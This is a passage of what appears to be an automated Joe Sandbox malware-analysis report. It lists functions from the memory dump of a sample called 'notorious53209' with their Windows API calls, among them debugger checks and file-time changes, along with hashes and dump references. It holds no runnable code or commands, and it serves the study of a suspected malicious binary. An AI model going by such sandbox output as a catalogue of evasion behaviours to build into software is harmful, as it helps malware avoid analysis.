                                                  • Instruction Fuzzy Hash: 793175B55097019FD720EF24D884B97BBF4FB4A304F00092EF59AC3251D7B56948DB96
                                                  Function 008A594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __FF_MSGBANNER.LIBCMT ref: 008A5963
                                                    • Part of subcall function 008AA3AB: __NMSG_WRITE.LIBCMT ref: 008AA3D2
                                                    • Part of subcall function 008AA3AB: __NMSG_WRITE.LIBCMT ref: 008AA3DC
                                                  • __NMSG_WRITE.LIBCMT ref: 008A596A
                                                    • Part of subcall function 008AA408: GetModuleFileNameW.KERNEL32(00000000,009443BA,00000104,00000000,00000001,00000000), ref: 008AA49A
                                                    • Part of subcall function 008AA408: ___crtMessageBoxW.LIBCMT ref: 008AA548
                                                    • Part of subcall function 008A32DF: ___crtCorExitProcess.LIBCMT ref: 008A32E5
                                                    • Part of subcall function 008A32DF: ExitProcess.KERNEL32 ref: 008A32EE
                                                    • Part of subcall function 008A8D68: __getptd_noexit.LIBCMT ref: 008A8D68
                                                  • RtlAllocateHeap.NTDLL(00AA0000,00000000,00000001), ref: 008A598F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                  • String ID:
                                                  • API String ID: 1372826849-0
                                                  • Opcode ID: 368921db3f88e573e7b07e767b5c79994456a295e5b8dbe5166a021e6ffff279
                                                  • Instruction ID: 61ef6513c132713cc898732e195cd6fbf40287ce7ea21af0c6894661ea8a241b
                                                  • Opcode Fuzzy Hash: 368921db3f88e573e7b07e767b5c79994456a295e5b8dbe5166a021e6ffff279
                                                  • Instruction Fuzzy Hash: BC01C035214A15DEF6212B28BC52B6B7658FF43774F18002AF500EFD81DBB09D819262
                                                  Function 008E9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 008E9B45
                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,008E97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008E9B5B
                                                  • CloseHandle.KERNEL32(00000000), ref: 008E9B62
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleTime
                                                  • String ID:
                                                  • API String ID: 3397143404-0
                                                  • Opcode ID: 0572c55ffa36f43ea7ea8558e0601c1f44674fb341f0c289a76043b56cc5c0f9
                                                  • Instruction ID: 828905c44dcf2327938cb69488b922b8a1c28126878aa6bc9343b48466b1f173
                                                  • Opcode Fuzzy Hash: 0572c55ffa36f43ea7ea8558e0601c1f44674fb341f0c289a76043b56cc5c0f9
                                                  • Instruction Fuzzy Hash: 90E08632184324BBD7311B54EC09FCA7B18EB05B71F104120FB64A94E087B12611A798
                                                  Function 008E8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 008E8FA5
                                                    • Part of subcall function 008A2F95: HeapFree.KERNEL32(00000000,00000000), ref: 008A2FA9
                                                    • Part of subcall function 008A2F95: GetLastError.KERNEL32(00000000,?,008A9C64), ref: 008A2FBB
                                                  • _free.LIBCMT ref: 008E8FB6
                                                  • _free.LIBCMT ref: 008E8FC8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
                                                  • Instruction ID: efe858bc38702fb1aead1598cd7435e54a283fbf26bceabc572b1837d2be3faa
                                                  • Opcode Fuzzy Hash: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
                                                  • Instruction Fuzzy Hash: F4E012A1709B419EDA34A57DAD40A9757EEFF4A350718081DB40DDB542DE24E8418128
                                                  Function 0088AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CALL
                                                  • API String ID: 0-4196123274
                                                  • Opcode ID: 320b1ddfaa41f7a92aa55f629b0a4b3db4f56618a7e5b188654d1b46c902b2bc
                                                  • Instruction ID: 37b5df10234fa476e0c00be32904595ea23a2fa63b64c771b32bb4243572a173
                                                  • Opcode Fuzzy Hash: 320b1ddfaa41f7a92aa55f629b0a4b3db4f56618a7e5b188654d1b46c902b2bc
                                                  • Instruction Fuzzy Hash: 4B221674508245DFDB28EF18C494B2AB7E1FF85344F15895EE896CB3A2D731E941CB82
                                                  Function 00884DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID: EA06
                                                  • API String ID: 4104443479-3962188686
                                                  • Opcode ID: 0528dcf65f54be279ce23b15fcfc377cf3ceadf9af8b0b5de1f1627c4f5ac264
                                                  • Instruction ID: 3d000b11c29dbb6fd68ca366a65b71b0c64b2c3b9f6cfdfa9fd06dda32c2dc8b
                                                  • Opcode Fuzzy Hash: 0528dcf65f54be279ce23b15fcfc377cf3ceadf9af8b0b5de1f1627c4f5ac264
                                                  • Instruction Fuzzy Hash: 34416E23A046596BDF21BB68C8517BE7FA5FB01314F586065FC82DB282D6219D4483A2
                                                  Function 0088492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • 73666F36.UXTHEME ref: 00884992
                                                    • Part of subcall function 008A35AC: __lock.LIBCMT ref: 008A35B2
                                                    • Part of subcall function 008A35AC: RtlDecodePointer.NTDLL(00000001), ref: 008A35BE
                                                    • Part of subcall function 008A35AC: RtlEncodePointer.NTDLL(?), ref: 008A35C9
                                                    • Part of subcall function 00884A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00884A73
                                                    • Part of subcall function 00884A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00884A88
                                                    • Part of subcall function 00883B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00883B7A
                                                    • Part of subcall function 00883B4C: IsDebuggerPresent.KERNEL32 ref: 00883B8C
                                                    • Part of subcall function 00883B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,009462F8,009462E0,?,?), ref: 00883BFD
                                                    • Part of subcall function 00883B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00883C81
                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008849D2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$73666DebuggerDecodeEncodeFullNamePathPresent__lock
                                                  • String ID:
                                                  • API String ID: 1649018686-0
                                                  • Opcode ID: ed4492009d61d8bf8e546f80bc133a11eddc77e15771a87e4eba2860999c7b9f
                                                  • Instruction ID: 28d737606b2a7257e99931a482a85238fc9d0471fd4c13582fd68f3bcf1a5572
                                                  • Opcode Fuzzy Hash: ed4492009d61d8bf8e546f80bc133a11eddc77e15771a87e4eba2860999c7b9f
                                                  • Instruction Fuzzy Hash: 551188B1928315ABC300EF68EC45D1AFBE8FB96710F00451AF091C32B1DBB09648DB92
                                                  Function 00885DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00885E27
                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 008BE19C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: ee1e297ec250bdba310d48f35d2af5f6a1f2080d75633a3242b0ab138c6c6615
                                                  • Instruction ID: 9a25bbef271173c30e187b18d3509495a2fa68fd18146eedfa24eb43acb56313
                                                  • Opcode Fuzzy Hash: ee1e297ec250bdba310d48f35d2af5f6a1f2080d75633a3242b0ab138c6c6615
                                                  • Instruction Fuzzy Hash: 06017570244709BEF7645E28CC8AFA63B9CFB0576CF108319BAE59A1E0C6B45E498B50
                                                  Function 008A582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __lock_file_memset
                                                  • String ID:
                                                  • API String ID: 26237723-0
                                                  • Opcode ID: f65520a447ff17e4be5ecc27f91e27a97a1141341d0060815c72d8624358b8ea
                                                  • Instruction ID: d3f5cc68ee5251e0d489bacb0163fbc2f88664bf7e157dc52d2f4b31a0d86cc3
                                                  • Opcode Fuzzy Hash: f65520a447ff17e4be5ecc27f91e27a97a1141341d0060815c72d8624358b8ea
                                                  • Instruction Fuzzy Hash: DD018871C00609EBEF11AF6D8C0559F7B61FF42760F144225F814DB561DB358A61DB62
                                                  Function 008A55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008A8D68: __getptd_noexit.LIBCMT ref: 008A8D68
                                                  • __lock_file.LIBCMT ref: 008A561B
                                                    • Part of subcall function 008A6E4E: __lock.LIBCMT ref: 008A6E71
                                                  • __fclose_nolock.LIBCMT ref: 008A5626
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                  • String ID:
                                                  • API String ID: 2800547568-0
                                                  • Opcode ID: 0bf8525f85c018c316413f0312696bbd02fdcfd610494c0d828584afd089b4fc
                                                  • Instruction ID: 1c3ff1106eb58e8b1420650b1e4206bba1b8c39f8aa27283759c5a648eb88978
                                                  • Opcode Fuzzy Hash: 0bf8525f85c018c316413f0312696bbd02fdcfd610494c0d828584afd089b4fc
                                                  • Instruction Fuzzy Hash: 35F09071800A05DAF720AF7D880276E77A1FF53334F658209E414EB9C1CF7C89829B66
                                                  Function 008AA06B Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • InitializeCriticalSectionEx.KERNELBASE(00000000,0093F6A8,008A9C4E,?,008A9F4B,00000000,00000FA0,00000000,0093BE28,00000008,008A9E62,00000000,00000000,?,008A9CBC,0000000D), ref: 008AA084
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,0093F6A8,?,008A9F4B,00000000,00000FA0,00000000,0093BE28,00000008,008A9E62,00000000,00000000,?,008A9CBC,0000000D), ref: 008AA08E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CriticalInitializeSection$CountSpin
                                                  • String ID:
                                                  • API String ID: 4156364057-0
                                                  • Opcode ID: 8a059e2af9986a097e74257ae6fe4195dc3d1bae58ee7c3c1bcc70e23628b09e
                                                  • Instruction ID: 91ff6a8c6fde7f95b010f892bcfb4606c81fa99ebdca27f456ba0424f81b9246
                                                  • Opcode Fuzzy Hash: 8a059e2af9986a097e74257ae6fe4195dc3d1bae58ee7c3c1bcc70e23628b09e
                                                  • Instruction Fuzzy Hash: 70D0673606854CFFDF129FD4EC088A93BAAFF4D765B418420F92C89430D732E661AB40
                                                  Function 008881C1 Relevance: 2.6, APIs: 2, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0088558F,?,?,?,?,?), ref: 008881DA
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0088558F,?,?,?,?,?), ref: 0088820D
                                                    • Part of subcall function 008878AD: _memmove.LIBCMT ref: 008878E9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$_memmove
                                                  • String ID:
                                                  • API String ID: 3033907384-0
                                                  • Opcode ID: 7f742af5b6eb3763dd7ca65f89c3c34c66cdf5f318ed42dba4e0c960b8b19e3f
                                                  • Instruction ID: 6eb5356dcf91ef88c22fead95b1ad87c1013b9ccb25996dbe3e53eb947a34ee1
                                                  • Opcode Fuzzy Hash: 7f742af5b6eb3763dd7ca65f89c3c34c66cdf5f318ed42dba4e0c960b8b19e3f
                                                  • Instruction Fuzzy Hash: F001AD32209504BFEB24BA29DD4AF7B7B6CEB8A760F10802AFD05CD1D0DE60D8009672
                                                  Function 0088F3F0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f0b3e6d5ef9aed26ac9ebcad08eac77490232b868349ddcb532a002f1c61dba0
                                                  • Instruction ID: 3a41213b8646daf40b0d6c96c88c50c3a19e0e20a6edb543318f092d0af00813
                                                  • Opcode Fuzzy Hash: f0b3e6d5ef9aed26ac9ebcad08eac77490232b868349ddcb532a002f1c61dba0
                                                  • Instruction Fuzzy Hash: F0618A7060060A9FDB24EF68C991A6AB7F5FF09304F14807EEA16DB242E771ED91CB51
                                                  Function 00892123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6b6ea79881179563a54662c9e8cc3f6ff09924e025d0bddc4355b9fabf46a210
                                                  • Instruction ID: ba18474d58bf71c0d30e909c7c2803c9fc2b2d055cf688da9ceafd678e304cc0
                                                  • Opcode Fuzzy Hash: 6b6ea79881179563a54662c9e8cc3f6ff09924e025d0bddc4355b9fabf46a210
                                                  • Instruction Fuzzy Hash: 45515C35600614AFCF14FB68C991FAE77A6FF85314F188168F946EB392DA30ED148B52
                                                  Function 00885C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000), ref: 00885CF6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
